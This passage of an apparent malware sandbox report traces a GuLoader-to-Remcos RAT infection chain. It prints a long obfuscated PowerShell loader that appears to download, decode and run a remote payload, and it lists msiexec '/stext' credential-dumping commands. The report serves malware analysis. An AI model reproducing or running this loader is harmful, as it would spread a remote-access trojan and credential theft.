'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnqeHjelLaba NorResd r , i$.reB Hye PrtMataOv lslaiZebn sig,aveFrsrMensDra)V r ';$Betalingers=$Refractometry188;Vandende (Adiabaticlly ' Un$Kalgs bL HaOOldBalla.arLLeu:semEU,flslsE ntp Hoh.oiA I N KutH eI Fea tasFynIKurs,re=Lob( Rut Ure,ansLnlTses- Unp pfaCorTUn h,bs .nv$T,lBKatE G t MoaInfl s,iC nNop gantEs,cr Fis e)H s ');while (!$Elephantiasis) {Vandende (Adiabaticlly '.en$ AbgWaml anoTumb roa NilAgr:ValUPlonLnigPlarsejoHypp A.e idaOesbMa,lCapeKon=Bag$ApatstrrAriuP re A ') ;Vandende $Oxyhematin;Vandende (Adiabaticlly 'Mo.sBroTDrlARair I,T.li- hys,lsl wae M.eF rpsty P 4sof ');Vandende (Adiabaticlly 'M n$ Udg,rolBedO hB ana Unlpas: heditL oyEL.bpFreH isABi NspeTstaiGreaD,ssMoti Agsbe =T.n(LimTTacEInds HetFal-Vi p grasabt LghDef Ern$si.Bl nERa.tFdeasubLu.sIinsN ImG NoeHelRsy sTra)F a ') ;Vandende (Adiabaticlly 'alf$Teng ,alstiO,orB heaTopLPu :guiKPeru ntR ,os nduRefs DiF InO F,rP.lM CaAskaaAlhLKiss Mi=sis$DisG.amlsatOstubAnaAObelFra:Ry c TraQuaMskapCudBC oe pelneol.ueis osDrfm .n1 .i5.cc4Akv+Ven+svk%D l$gteFFe O stRProsGrdK KlNEtyiMewNKomgsubsGuir GtEKvisU luVvnl eaT T AAcct imE Asrsacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende (Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal ');Vandende (Adiabaticlly ' Vg$ R g P lPikoFgtbDi,a ulFor:Lnsksatr prirumlAut Her=pro ind[Ov.sPriysamsIndt ede Mam ir.AbsCAg oI,an wvfores arphotNo ].or:Op,:.utFBrdr L oHelmdisBov aChesIngeFor6 P 4 Ces oztA br,epiflunJergsal(Ind$IsoB s y.isd nieslulCinsGeofInnoskurGeosDaggVa.eAartJ r)Bis ');Vandende (Adiabaticlly ' re$TitgHenl Peo,loBvejAAfsLFri:KonRTekaAnltF aI PaOMarn lrANonlO.eiRe.s idE InR,reeR c Fo=Fus M t[BygsFloYPersRestTziEEf.Msub.Beht.nieThoXPirTLys. TeeA oN iCskrOstiDUnvI piNsteGE e]Mec:Fem:VaaAUdssBefcDroiBr iTra. eG Whef.rTsersMeitFakRNo IIseN .aG Ta(End$ChikQ.arBeriUnclJ,r)idi ');Vandende (Adiabaticlly 'Kal$AutGswil skOBerbU tAAmblB,g:sejsBioKFilrResh eO tiV lieHa d ,sEF sT k=Jge$strr ecaLi TB lI Teo ArnHaiAsimL s Isals Paesubr MaECi . WrsAbnu Deb sks stt OrrDati Nin ag Ad(Ko $skdsstatskra ,eT t uH ssskrlb aIMusNLeuJP rEBurnbas,.an$ nrnYanoin n InCCasustrr,onR fdEArtnstot DeL UdYRec) h ');Vandende $skrhovedet;"
Imagebase:	0x700000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1680885153.0000000008C40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1661877856.000000000601E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.1681623688.0000000009456000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	11:05:30
Start date:	21/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	7
Start time:	11:05:45
Start date:	21/10/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x200000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.1853013269.000000000501A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.1789395704.000000000501B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.1794834072.000000000501B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2634385047.000000000501A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.1779780238.000000000501B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Target ID:	10
Start time:	11:06:01
Start date:	21/10/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kfiuinmpbcvzn"
Imagebase:	0x200000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	11
Start time:	11:06:01
Start date:	21/10/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kfiuinmpbcvzn"
Imagebase:	0x200000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	12
Start time:	11:06:02
Start date:	21/10/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vzonifxrpknexemx"
Imagebase:	0x200000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	13
Start time:	11:06:02
Start date:	21/10/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xbbfjqhklsfrakibsnra"
Imagebase:	0x7ff75da10000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true